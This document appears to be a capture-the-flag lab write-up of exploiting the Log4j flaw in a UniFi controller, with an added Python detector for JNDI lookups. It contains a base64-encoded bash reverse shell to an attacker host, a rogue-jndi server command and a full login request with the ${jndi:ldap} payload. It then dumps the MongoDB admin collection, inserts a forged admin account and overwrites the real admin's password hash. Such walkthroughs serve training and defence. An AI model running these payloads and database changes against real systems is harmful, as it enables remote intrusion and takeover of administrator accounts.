It looks like it is a UniFi app vulnerable to Log4j, CVE-2021-44228.
If the app faces a public network, you can check whether the site is vulnerable by watching for DNS requests to a freely generated callback domain on the Internet. All information about this vulnerability can be found here:
I had tested this vulnerability in the TryHackMe room https://tryhackme.com/room/solar, so I decided to find a ready-made exploit.
https://github.com/veracode-research/rogue-jndi
I followed this PoC:
https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
10.10.14.62 - tester
10.129.92.85 - victim
echo 'bash -c bash -i >&/dev/tcp/10.10.14.62/4444 0>&1' | base64
result:
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNjIvNDQ0NCAwPiYxCg==
Use the previous result in this command:
java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNjIvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.62"
Request in Burp (HTTPS and HTTP/1.1 are required):
POST /api/login HTTP/1.1
Host: 10.129.92.85:8443
Content-Length: 107
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/json; charset=utf-8
Accept: */*
Origin: https://10.129.92.85:8443
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://10.129.92.85:8443/manage/account/login?redirect=%2Fmanage
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"username":"asdf","password":"asdfas","remember":"${jndi:ldap://10.10.14.62:1389/o=tomcat}","strict":true}
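As an added defender's example (not part of the original writeup), the following Python flags the `${jndi:...}` lookup in a captured request like the one above, walking every JSON field and header, and extracts the callback scheme, host and port so a responder knows what to block and hunt for. The sample request is constructed from the writeup's request with the headers trimmed.

```python
import json
import re
from typing import Any, Dict, List
# JNDI lookup with its callback scheme, host and optional port. Log4j lowercases the
# lookup prefix before dispatch, so the match is case-insensitive.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?",
    re.IGNORECASE)

def _scan_text(text: str, location: str, findings: List[Dict[str, str]]) -> None:
    """Record every JNDI lookup in one string, tagged with where it was seen."""
    for m in JNDI_RE.finditer(text):
        findings.append({"location": location, "scheme": m["scheme"].lower(),
                         "host": m["host"], "port": m["port"] or ""})

def _walk_json(value: Any, path: str, findings: List[Dict[str, str]]) -> None:
    """Recurse through decoded JSON so a lookup nested in any field is found."""
    if isinstance(value, dict):
        for key, item in value.items():
            _walk_json(item, f"{path}.{key}", findings)
    elif isinstance(value, list):
        for i, item in enumerate(value):
            _walk_json(item, f"{path}[{i}]", findings)
    elif isinstance(value, str):
        _scan_text(value, path, findings)

def find_jndi_lookups(raw_request: str) -> List[Dict[str, str]]:
    """Return the JNDI lookups found in a raw HTTP request's headers and body."""
    head, _, body = raw_request.partition("\r\n\r\n")
    findings: List[Dict[str, str]] = []
    for line in head.split("\r\n")[1:]:            # skip the request line
        name, _, val = line.partition(":")
        _scan_text(val, f"header:{name.strip()}", findings)
    if body.strip():
        try:
            _walk_json(json.loads(body), "body", findings)
        except json.JSONDecodeError:               # not JSON: scan it as plain text
            _scan_text(body, "body", findings)
    return findings

# Constructed sample modelled on the login request in the writeup (headers trimmed).
SAMPLE_REQUEST = (
    "POST /api/login HTTP/1.1\r\n"
    "Host: 10.129.92.85:8443\r\nContent-Type: application/json; charset=utf-8\r\n\r\n"
    '{"username":"asdf","password":"asdfas",'
    '"remember":"${jndi:ldap://10.10.14.62:1389/o=tomcat}","strict":true}'
)

if __name__ == "__main__":
    print(find_jndi_lookups(SAMPLE_REQUEST))
```

Run it over a proxy or WAF capture; each finding names the field that carried the lookup and the callback endpoint to block at the egress firewall.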
There is no Python on the box to spawn a better shell. I found another interesting way to spawn one:
script /dev/null -c bash
Further exploitation is based on the Sprocket Security approach.
MongoDB is running on port 27117:
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
I ran john on this hash:
mkpasswd -m sha-512 password
$6$4XXp2x9p1SWvtlnm$mLLC/Vau5FiajN9ge0QcNq3SGdzg1/.YWJAov3xgfq/PsWwa76T1maF28GogWgmt4T1WND/Ae8tzAP8Rj3ugm/
mongo --port 27117 ace --eval 'db.admin.insert({ "email" : "null@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "<PASSWORD-HASH>" })'
mongo --port 27117 ace --eval 'db.admin.insert({ "email" : "null@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "$6$4XXp2x9p1SWvtlnm$mLLC/Vau5FiajN9ge0QcNq3SGdzg1/.YWJAov3xgfq/PsWwa76T1maF28GogWgmt4T1WND/Ae8tzAP8Rj3ugm/" })'
creds:
unifi-admin:password
I couldn't use this account to manage anything in the UniFi app because of a broken JSON file, so I had to update the password of the original admin instead. The ObjectId identifies the document, and db.admin.update() updates its fields.
mkpasswd -m sha-512 password
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$4XXp2x9p1SWvtlnm$mLLC/Vau5FiajN9ge0QcNq3SGdzg1/.YWJAov3xgfq/PsWwa76T1maF28GogWgmt4T1WND/Ae8tzAP8Rj3ugm/"}})'
#Rooted